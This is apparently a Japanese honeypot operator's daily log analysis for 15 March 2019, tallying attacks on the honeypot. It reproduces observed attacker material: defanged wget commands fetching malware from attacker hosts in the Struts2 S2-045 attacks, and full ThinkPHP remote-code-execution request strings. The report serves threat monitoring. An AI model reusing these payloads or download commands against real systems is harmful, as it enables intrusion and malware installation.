ハニーポットのログ分析(2019/03/15)
WOWhoneypotの2019/03/15(金) (運用282日目)の簡易分析です。
本日の総アクセス件数は80件です。送信元IP数は32IPです。
本日の主なアクセスは以下です。
・ Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃:33 件
・ ThinkPHPの脆弱性を突いた攻撃:8 件
本日のドメイン名でのアクセスは以下です。
3 GET /
1 GET /robots.txt
本日のハンティングログは以下です。Struts2の攻撃の通信先です。
5 2019-03-15 wget -c hxxp://154.85.99.85:8080/Linux2.6
4 2019-03-15 wget -c hxxp://wap.tfddos.net:57843/linux
1 2019-03-15 wget hxxp://103.243.27.233:3721/Linux-syn045
以下が全アクセスログです。
件数 | 日付 | 種別 | リクエスト |
33 | 2019/3/15 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /index.action |
31 | 2019/3/15 | アクセス | GET / |
2 | 2019/3/15 | XDebugの調査 | GET /?XDEBUG_SESSION_START=phpstorm |
1 | 2019/3/15 | クローリング | HEAD /robots.txt |
1 | 2019/3/15 | スキャナによる調査 | HEAD /redirect.php |
1 | 2019/3/15 | PHPUnitの調査 | GET /vendor/phpunit/phpunit/README.md |
1 | 2019/3/15 | ThinkPHPの脆弱性を突いた攻撃 | GET /TP/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
1 | 2019/3/15 | ThinkPHPの脆弱性を突いた攻撃 | GET /TP/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
1 | 2019/3/15 | ThinkPHPの脆弱性を突いた攻撃 | GET /TP/html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
1 | 2019/3/15 | ThinkPHPの脆弱性を突いた攻撃 | GET /thinkphp/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
1 | 2019/3/15 | ThinkPHPの脆弱性を突いた攻撃 | GET /thinkphp/html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
1 | 2019/3/15 | クローリング | GET /robots.txt |
1 | 2019/3/15 | ThinkPHPの脆弱性を突いた攻撃 | GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
1 | 2019/3/15 | ThinkPHPの脆弱性を突いた攻撃 | GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
1 | 2019/3/15 | ThinkPHPの脆弱性を突いた攻撃 | GET /html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP |
1 | 2019/3/15 | D-Linkルータの脆弱性(CVE-2015-2051)の調査 | GET /HNAP1/ |
1 | 2019/3/15 | 管理者設定の調査 | GET /admin/config.php |
以上です。